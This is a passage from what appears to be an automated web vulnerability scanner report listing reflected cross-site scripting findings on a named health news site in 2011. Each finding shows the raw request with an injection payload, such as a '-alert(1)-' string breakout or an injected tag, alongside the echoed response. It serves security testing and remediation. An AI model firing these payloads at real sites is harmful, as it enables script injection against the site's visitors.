...[SNIP]...
pe="text/javascript">
setTimeout('COMSCORE.beacon({'+
'c1:2,'+
'c2:"6035753",'+
'c3:"6035753",'+
'c4:"http://www.myhealthnewsdaily.com/desk-jobs-possibly-increase-weight-gain-0508/?61080'-alert(1)-'63053a0624=1",'+
'c5:"Technology - News",'+
'c6:"",'+
'c15:""'+
'});',0);
</script>
...[SNIP]...

2.66. http://www.myhealthnewsdaily.com/desk-jobs-possibly-increase-weight-gain-0508/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.myhealthnewsdaily.com
Path:   /desk-jobs-possibly-increase-weight-gain-0508/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload acddb"><a>fa85ce056dc was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /desk-jobs-possibly-increase-weight-gain-0508/?acddb"><a>fa85ce056dc=1 HTTP/1.1
Host: www.myhealthnewsdaily.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 04:06:13 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: Zend Core/2.5.5 PHP/5.2.11
Set-Cookie: a5e04250348ef9239c1cdf4824f43ad1=gfbk3mrjb5bisj3hrv2j3t8d06; path=/
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Wed, 12 Jan 2011 04:06:13 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 43048

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
<head>
<script type="text/javascript">
<!--
var a
...[SNIP]...
<link rel="canonical" src="http://www.myhealthnewsdaily.com/desk-jobs-possibly-increase-weight-gain-0508/?acddb"><a>fa85ce056dc=1/" />
...[SNIP]...

2.67. http://www.myhealthnewsdaily.com/even-youth-sports-dont-provide-enough-exercise-study-finds-0842/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.myhealthnewsdaily.com
Path:   /even-youth-sports-dont-provide-enough-exercise-study-finds-0842/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 22581'-alert(1)-'62a12ee3b75 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /even-youth-sports-dont-provide-enough-exercise-study-finds-084222581'-alert(1)-'62a12ee3b75/ HTTP/1.1
Host: www.myhealthnewsdaily.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 04:06:38 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: Zend Core/2.5.5 PHP/5.2.11
Set-Cookie: a5e04250348ef9239c1cdf4824f43ad1=lr02l468jn3lcgmb9j3kpk3ka1; path=/
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Wed, 12 Jan 2011 04:06:38 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 48200

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
<head>
<script type="text/javascript">
<!--
var a
...[SNIP]...
pt">
setTimeout('COMSCORE.beacon({'+
'c1:2,'+
'c2:"6035753",'+
'c3:"6035753",'+
'c4:"http://www.myhealthnewsdaily.com/even-youth-sports-dont-provide-enough-exercise-study-finds-084222581'-alert(1)-'62a12ee3b75/",'+
'c5:"Technology - News",'+
'c6:"",'+
'c15:""'+
'});',0);
</script>
...[SNIP]...

2.68. http://www.myhealthnewsdaily.com/even-youth-sports-dont-provide-enough-exercise-study-finds-0842/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.myhealthnewsdaily.com
Path:   /even-youth-sports-dont-provide-enough-exercise-study-finds-0842/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 34dfc"><a>ac275f3ef5b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /even-youth-sports-dont-provide-enough-exercise-study-finds-0842/?34dfc"><a>ac275f3ef5b=1 HTTP/1.1
Host: www.myhealthnewsdaily.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 04:06:16 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: Zend Core/2.5.5 PHP/5.2.11
Set-Cookie: a5e04250348ef9239c1cdf4824f43ad1=128k45ne0hoq9grj3jbp0b8f03; path=/
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Wed, 12 Jan 2011 04:06:16 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 45286

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
<head>
<script type="text/javascript">
<!--
var a
...[SNIP]...
<link rel="canonical" src="http://www.myhealthnewsdaily.com/even-youth-sports-dont-provide-enough-exercise-study-finds-0842/?34dfc"><a>ac275f3ef5b=1/" />
...[SNIP]...

2.69. http://www.myhealthnewsdaily.com/even-youth-sports-dont-provide-enough-exercise-study-finds-0842/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.myhealthnewsdaily.com
Path:   /even-youth-sports-dont-provide-enough-exercise-study-finds-0842/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d315f'-alert(1)-'fffd6ba0c4c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /even-youth-sports-dont-provide-enough-exercise-study-finds-0842/?d315f'-alert(1)-'fffd6ba0c4c=1 HTTP/1.1
Host: www.myhealthnewsdaily.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 04:06:32 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: Zend Core/2.5.5 PHP/5.2.11
Set-Cookie: a5e04250348ef9239c1cdf4824f43ad1=3kcvnnldarnmmpc0fd0ueepe97; path=/
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Wed, 12 Jan 2011 04:06:32 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 44924

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
<head>
<script type="text/javascript">
<!--
var a
...[SNIP]...
">
setTimeout('COMSCORE.beacon({'+
'c1:2,'+
'c2:"6035753",'+
'c3:"6035753",'+
'c4:"http://www.myhealthnewsdaily.com/even-youth-sports-dont-provide-enough-exercise-study-finds-0842/?d315f'-alert(1)-'fffd6ba0c4c=1",'+
'c5:"Technology - News",'+
'c6:"",'+
'c15:""'+
'});',0);
</script>
...[SNIP]...

2.70. http://www.myhealthnewsdaily.com/exercise-reduces-risk-some-cancer-0730/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.myhealthnewsdaily.com
Path:   /exercise-reduces-risk-some-cancer-0730/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 51470'-alert(1)-'4c9a35c202a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /exercise-reduces-risk-some-cancer-073051470'-alert(1)-'4c9a35c202a/ HTTP/1.1
Host: www.myhealthnewsdaily.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 04:06:37 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: Zend Core/2.5.5 PHP/5.2.11
Set-Cookie: a5e04250348ef9239c1cdf4824f43ad1=rb59c1rfgrgqgsito3a1simbj3; path=/
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Wed, 12 Jan 2011 04:06:37 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 48150

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
<head>
<script type="text/javascript">
<!--
var a
...[SNIP]...
cript type="text/javascript">
setTimeout('COMSCORE.beacon({'+
'c1:2,'+
'c2:"6035753",'+
'c3:"6035753",'+
'c4:"http://www.myhealthnewsdaily.com/exercise-reduces-risk-some-cancer-073051470'-alert(1)-'4c9a35c202a/",'+
'c5:"Technology - News",'+
'c6:"",'+
'c15:""'+
'});',0);
</script>
...[SNIP]...

2.71. http://www.myhealthnewsdaily.com/exercise-reduces-risk-some-cancer-0730/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.myhealthnewsdaily.com
Path:   /exercise-reduces-risk-some-cancer-0730/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 55777'-alert(1)-'3709ac8101d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /exercise-reduces-risk-some-cancer-0730/?55777'-alert(1)-'3709ac8101d=1 HTTP/1.1
Host: www.myhealthnewsdaily.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 04:06:31 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: Zend Core/2.5.5 PHP/5.2.11
Set-Cookie: a5e04250348ef9239c1cdf4824f43ad1=ojs6ch3mmcjh0quinpom03hl11; path=/
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Wed, 12 Jan 2011 04:06:31 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 41135

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
<head>
<script type="text/javascript">
<!--
var a
...[SNIP]...
ipt type="text/javascript">
setTimeout('COMSCORE.beacon({'+
'c1:2,'+
'c2:"6035753",'+
'c3:"6035753",'+
'c4:"http://www.myhealthnewsdaily.com/exercise-reduces-risk-some-cancer-0730/?55777'-alert(1)-'3709ac8101d=1",'+
'c5:"Technology - News",'+
'c6:"",'+
'c15:""'+
'});',0);
</script>
...[SNIP]...

2.72. http://www.myhealthnewsdaily.com/exercise-reduces-risk-some-cancer-0730/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.myhealthnewsdaily.com
Path:   /exercise-reduces-risk-some-cancer-0730/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2fa7c"><a>562ebf37587 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /exercise-reduces-risk-some-cancer-0730/?2fa7c"><a>562ebf37587=1 HTTP/1.1
Host: www.myhealthnewsdaily.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 04:06:15 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: Zend Core/2.5.5 PHP/5.2.11
Set-Cookie: a5e04250348ef9239c1cdf4824f43ad1=g6istoo6bbl45n6qa9sqf1s060; path=/
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Wed, 12 Jan 2011 04:06:15 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 41497

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
<head>
<script type="text/javascript">
<!--
var a
...[SNIP]...
<link rel="canonical" src="http://www.myhealthnewsdaily.com/exercise-reduces-risk-some-cancer-0730/?2fa7c"><a>562ebf37587=1/" />
...[SNIP]...

2.73. http://www.myhealthnewsdaily.com/nintendo-3d-games-unlikely-to-damage-childrens-eyes-0997/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.myhealthnewsdaily.com
Path:   /nintendo-3d-games-unlikely-to-damage-childrens-eyes-0997/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cdb47'-alert(1)-'e93b250d9bc was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /nintendo-3d-games-unlikely-to-damage-childrens-eyes-0997cdb47'-alert(1)-'e93b250d9bc/ HTTP/1.1
Host: www.myhealthnewsdaily.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 04:06:38 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: Zend Core/2.5.5 PHP/5.2.11
Set-Cookie: a5e04250348ef9239c1cdf4824f43ad1=oe2m22mbjhan1ibqu29eikoqe1; path=/
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Wed, 12 Jan 2011 04:06:38 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 48186

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
<head>
<script type="text/javascript">
<!--
var a
...[SNIP]...
avascript">
setTimeout('COMSCORE.beacon({'+
'c1:2,'+
'c2:"6035753",'+
'c3:"6035753",'+
'c4:"http://www.myhealthnewsdaily.com/nintendo-3d-games-unlikely-to-damage-childrens-eyes-0997cdb47'-alert(1)-'e93b250d9bc/",'+
'c5:"Technology - News",'+
'c6:"",'+
'c15:""'+
'});',0);
</script>
...[SNIP]...

2.74. http://www.myhealthnewsdaily.com/nintendo-3d-games-unlikely-to-damage-childrens-eyes-0997/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.myhealthnewsdaily.com
Path:   /nintendo-3d-games-unlikely-to-damage-childrens-eyes-0997/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload dd91c'-alert(1)-'d8d7d6d1bfd was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /nintendo-3d-games-unlikely-to-damage-childrens-eyes-0997/?dd91c'-alert(1)-'d8d7d6d1bfd=1 HTTP/1.1
Host: www.myhealthnewsdaily.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 04:06:31 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: Zend Core/2.5.5 PHP/5.2.11
Set-Cookie: a5e04250348ef9239c1cdf4824f43ad1=p15ri2g6atm7sritnsfabpab72; path=/
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Wed, 12 Jan 2011 04:06:31 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 46194

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
<head>
<script type="text/javascript">
<!--
var a
...[SNIP]...
ascript">
setTimeout('COMSCORE.beacon({'+
'c1:2,'+
'c2:"6035753",'+
'c3:"6035753",'+
'c4:"http://www.myhealthnewsdaily.com/nintendo-3d-games-unlikely-to-damage-childrens-eyes-0997/?dd91c'-alert(1)-'d8d7d6d1bfd=1",'+
'c5:"Technology - News",'+
'c6:"",'+
'c15:""'+
'});',0);
</script>
...[SNIP]...

2.75. http://www.myhealthnewsdaily.com/nintendo-3d-games-unlikely-to-damage-childrens-eyes-0997/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.myhealthnewsdaily.com
Path:   /nintendo-3d-games-unlikely-to-damage-childrens-eyes-0997/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d32d1"><a>8f18d8411fa was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /nintendo-3d-games-unlikely-to-damage-childrens-eyes-0997/?d32d1"><a>8f18d8411fa=1 HTTP/1.1
Host: www.myhealthnewsdaily.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 04:06:15 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: Zend Core/2.5.5 PHP/5.2.11
Set-Cookie: a5e04250348ef9239c1cdf4824f43ad1=7fnurl4hv2au8e3bnqqietalb5; path=/
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Wed, 12 Jan 2011 04:06:15 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 46556

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
<head>
<script type="text/javascript">
<!--
var a
...[SNIP]...
<link rel="canonical" src="http://www.myhealthnewsdaily.com/nintendo-3d-games-unlikely-to-damage-childrens-eyes-0997/?d32d1"><a>8f18d8411fa=1/" />
...[SNIP]...

2.76. http://www.myhealthnewsdaily.com/ten-medical-myths-0947/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.myhealthnewsdaily.com
Path:   /ten-medical-myths-0947/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cf6d2'-alert(1)-'0e6d5f2e9a7 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /ten-medical-myths-0947cf6d2'-alert(1)-'0e6d5f2e9a7/ HTTP/1.1
Host: www.myhealthnewsdaily.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 04:06:37 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: Zend Core/2.5.5 PHP/5.2.11
Set-Cookie: a5e04250348ef9239c1cdf4824f43ad1=m9qke2n5h84plai40ak20stg62; path=/
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Wed, 12 Jan 2011 04:06:38 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 48118

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
<head>
<script type="text/javascript">
<!--
var a
...[SNIP]...
<script type="text/javascript">
setTimeout('COMSCORE.beacon({'+
'c1:2,'+
'c2:"6035753",'+
'c3:"6035753",'+
'c4:"http://www.myhealthnewsdaily.com/ten-medical-myths-0947cf6d2'-alert(1)-'0e6d5f2e9a7/",'+
'c5:"Technology - News",'+
'c6:"",'+
'c15:""'+
'});',0);
</script>
...[SNIP]...

2.77. http://www.myhealthnewsdaily.com/ten-medical-myths-0947/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.myhealthnewsdaily.com
Path:   /ten-medical-myths-0947/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f0365"><a>abf4f39507 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /ten-medical-myths-0947/?f0365"><a>abf4f39507=1 HTTP/1.1
Host: www.myhealthnewsdaily.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 04:06:15 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: Zend Core/2.5.5 PHP/5.2.11
Set-Cookie: a5e04250348ef9239c1cdf4824f43ad1=kv5tc4mr5urckvrn0p9slonm33; path=/
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Wed, 12 Jan 2011 04:06:15 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 40075

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
<head>
<script type="text/javascript">
<!--
var a
...[SNIP]...
<link rel="canonical" src="http://www.myhealthnewsdaily.com/ten-medical-myths-0947/?f0365"><a>abf4f39507=1/" />
...[SNIP]...

2.78. http://www.myhealthnewsdaily.com/ten-medical-myths-0947/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.myhealthnewsdaily.com
Path:   /ten-medical-myths-0947/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b1b82'-alert(1)-'80c0151c2fe was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /ten-medical-myths-0947/?b1b82'-alert(1)-'80c0151c2fe=1 HTTP/1.1
Host: www.myhealthnewsdaily.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 04:06:31 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: Zend Core/2.5.5 PHP/5.2.11
Set-Cookie: a5e04250348ef9239c1cdf4824f43ad1=bhvhh3gi5fir5m0pct0fi8je13; path=/
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Wed, 12 Jan 2011 04:06:31 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 39743

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
<head>
<script type="text/javascript">
<!--
var a
...[SNIP]...
<script type="text/javascript">
setTimeout('COMSCORE.beacon({'+
'c1:2,'+
'c2:"6035753",'+
'c3:"6035753",'+
'c4:"http://www.myhealthnewsdaily.com/ten-medical-myths-0947/?b1b82'-alert(1)-'80c0151c2fe=1",'+
'c5:"Technology - News",'+
'c6:"",'+
'c15:""'+
'});',0);
</script>
...[SNIP]...

2.79. http://www.myhealthnewsdaily.com/ten-new-tips-to-eat-healthy-0992/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.myhealthnewsdaily.com
Path:   /ten-new-tips-to-eat-healthy-0992/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b0003'-alert(1)-'1acc833ee4 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /ten-new-tips-to-eat-healthy-0992b0003'-alert(1)-'1acc833ee4/ HTTP/1.1
Host: www.myhealthnewsdaily.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

